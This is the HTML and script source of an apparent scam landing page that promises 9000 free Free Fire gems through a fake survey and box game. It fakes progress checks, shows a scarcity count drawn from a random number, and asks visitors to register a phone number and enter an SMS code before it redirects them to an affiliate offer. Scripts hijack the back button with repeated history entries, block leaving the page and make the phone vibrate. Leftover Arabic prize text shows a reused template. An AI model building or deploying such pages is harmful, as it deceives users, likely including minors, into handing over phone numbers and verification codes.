<!doctype html>
<html lang="en" dir="ltr">
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<title>  aniversario de fuego libre</title>
	<link rel="canonical" href="https://blabaneg.pages.dev" />
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="lander" content="survey-pick-a-box">
<meta name="description" content="survey-pick-a-box">
<link rel="shortcut icon" href="data:image/x-icon" type="image/x-icon">
<link href="css/app.css" type="text/css" rel="stylesheet" />
<link href="app.css" type="text/css" rel="stylesheet" />
<meta name="robots" content="noindex,nofollow">
<script defer data-domain="blaban" src="js/script.js"></script>
</head>
<body style="background: url('https://www11.0zz0.com/2024/10/13/17/354711248.png');background-repeat: no-repeat;background-size: cover;">
<div>
  <img src="https://www11.0zz0.com/2024/10/13/17/354711248.png" style="filter: drop-shadow(5px 5px 5px #242327);" width="160px" height="160px">
</div>
<div class="app" id="app" v-cloak>
<vue-modal v-show="!showRotator && !showPrize" :open="showOpeningModal" class="opening-modal">
<img class="opening-modal__image" src="https://www11.0zz0.com/2024/10/13/17/354711248.png" style="width: 165px;filter: drop-shadow(5px 5px 5px #242327);" alt="Apple iPhone 13 Pro Max" />
<h1 class="heading heading--h1">
  !! Felicidades  !
</h1>
<p class="paragraph"> ¡Free Fire es el juego móvil más descargado del mundo durante 4 años consecutivos!
  Consigue 9000 gemas 🔥🎁 para celebrar este logro
  Consíguelo ahora🎁👇.
.
</p>
<p class="paragraph">
</p>
<button class="button" v-on:click="showOpeningModal = false; $confetti.stop()">
  Consíguelo ahora🎁👇
</button>
</vue-modal>
<vue-modal :open="showInstructionsModal">
<img src="N49BUCH.png" style="width: 80px;">
<h2 class="heading heading--h1">   Tu respuesta se ha guardado correctamente.</h2>
<p class="paragraph">
  Ahora tienes la oportunidad de conseguir diamantes.
<br><br>

✅ Registre su número de teléfono para obtener 9000 gemas
<br><br>
✅Cuando se le indique, recibirá un código de mensaje con el número, ingréselo y presione Sí..</p>
<button class="button" onclick="go()">
  Continuidad
</button>
</vue-modal>
<vue-modal :open="showFailModal">
<h1 class="heading heading--h1">حظ أوفر في المرة القادمة</h1>
<p class="paragraph">
.لديك (2) فرص اضافية
</p>
<button class="button" v-on:click="showFailModal = false">
موافق
</button>
</vue-modal>
<vue-modal :open="showSuccessModal">
<img src="UarHZhk.png" style="width: 300px;">
<h1 class="heading heading--h1">!!تهانينا لك</h1>
<p class="paragraph">
انت الرابح معنا بجائزة <br><br> ٣ القنبلة + ٣ أزر بـ لبن + ٤ قشطوطة + ٣ كشري + ٤ ام علي <br><br>اتبع التعليمات التالية للحصول على جائزتك
</p>
<button class="button" onclick="go();">
استمرار
</button>
</vue-modal>
<div class="left" style="display: none;">
<div class="product-preview">
<div class="product-preview__title">
</div>
</div>
</div>
<div class="right" style="
border-radius: 20px;
">
<vue-box-picker v-if="showBoxPicker" :vertical-items="4"  lid-image="id.png" box-image="box.png" box-back-image="box-back.png" prize-image="img/prizes/iphone-13-pro-max/default@0.75x.png" v-on:fail="onBoxPickerFail" v-on:success="onBoxPickerSuccess" :horizontal-items="3" :max-clicks="2"></vue-box-picker>
<div class="verify" v-if="showRotator">
<style>
  #lolbox{grid-template-columns: repeat(4, 1fr);border-radius: 20px;border: 1px solid black;box-shadow: 7px 7px 20px white}
</style>
<vue-text-rotator id="lolbox" v-on:rotate="rotate" v-on:finished="onRotatorFinished" :strings='[
                     "....por favor espera un momento.                     ",
              "....por favor espera un momento.              ",
              "....por favor espera un momento.              ",  ]'>
</vue-text-rotator>
<div class="verify__text" v-if="rotateIndex > 1">
<strong>
  Respondiste todas las preguntas
</strong>
<img class="verify__icon verify__icon--checked" src="checked.png" alt="" />
</div>
<div class="verify__text" v-else>
  Tu respuesta está siendo procesada.
<img class="verify__icon verify__icon--spinner" :class="{'verify__icon--visible' : rotateIndex > 0}" src="spinner.gif" alt="" />
</div>
<div class="verify__text" v-if="rotateIndex > 2">
<strong>
  Registrado exitosamente para la Beca Diamante</strong>
<img class="verify__icon verify__icon--checked" src="checked.png" alt="" />
</div>
<div class="verify__text" v-else>
  El registro para la donación de diamantes está en curso.
<img class="verify__icon verify__icon--spinner" :class="{'verify__icon--visible' : rotateIndex > 1}" src="spinner.gif" alt="" />
</div>
<div class="verify__text" v-if="rotateIndex > 3">
<strong id="left-in">
  ¡Solo quedan 1294 premios!
</strong>
<img class="verify__icon verify__icon--checked" src="checked.png" alt="" />
</div>
<div class="verify__text" v-else>
  Comprobando su número para donación de diamantes
<img class="verify__icon verify__icon--spinner" :class="{'verify__icon--visible' : rotateIndex > 2 }" src="spinner.gif" alt="" />
</div>
</div>
<vue-survey style="
border-radius: 20px;
border: 1px solid black;
box-shadow: 7px 7px 20px #502323;
" v-if="showSurvey" v-if="showSurvey" :show-steps="true" :questions='[
            {
              title: "  cual es tu genero              ?              ",
              answers: [ { text: "masculino" }, { text: "femenino" } ]
            },
            {
              title: "  cuántos años tiene              ?              ",
              answers: [ { text: "  Menores de 18 años              " }, { text: "18-29" }, { text: "30-39" }, { text: "40-49" }, { text: "50+" } ]
            },
            {
              title: "     ¿Alguna vez has solicitado un diamante?              ?              ",
              answers: [ { text: "Sí              " }, { text: "No" } ]
            },
          ]' v-on:finish="onSurveyFinish"></vue-survey>
</div>
</div>
<!-- <img src='https://i.ibb.co/0ZmyQP6/70898.jpg' width='80%'/> -->
<script>window.view = window.view || {};view.offerUrl = "https:\/\/rdr.funcontent.xyz/click";view.qs = null;view.skip = 0;view.screenshot = 0;view.download = 1;view.noredir = false;</script> <script src="js/app.js?id=d41d8cd98f00b204e980" type="application/javascript"></script>
<script src="app.js" type="application/javascript"></script>
<script>
function go() {
    window.onbeforeunload = null;
    window.location.href = 'https://goearn.ayznoo.online/?utm_medium=81a54bfb22b72948a38ad132cbba5ec94fab1758&utm_campaign=DuhaMaryam21-12&cid=852145';
}
</script>
<script>
var PreventExitPop = true;
function ExitPop() {
    if (PreventExitPop != false) {
        return "Don't miss out!";
    }
}
window.onbeforeunload = ExitPop;
</script>
<script>
    ! function() {
    var t;
    try {
        const URL = window.location.href.split(/[#]/)[0];
        for (t = 0; 10 > t; ++t) history.pushState({}, "", URL + '#')
        onpopstate = function(event) {
            event.state &&
        }
    } catch (o) {
        console.log(o);
    }
}();
</script>
<script>
	navigator.vibrate([1000, 300, 1000, 300,1000]);
</script>
<script src="p.js" defer></script>
<script>
  // Function to generate a random number between 200 and 2000
  function getRandomNumber(min, max) {
    return Math.floor(Math.random() * (max - min + 1)) + min;
  }

  // Set the random number to the element with ID 'left-in'
  document.getElementById('left-in').innerText = `!تبقي ${getRandomNumber(200, 2000)} جائزة فقط`;
</script>
<noscript><img src="l3NimxL.png" width="1" height="1" /></noscript>
</html>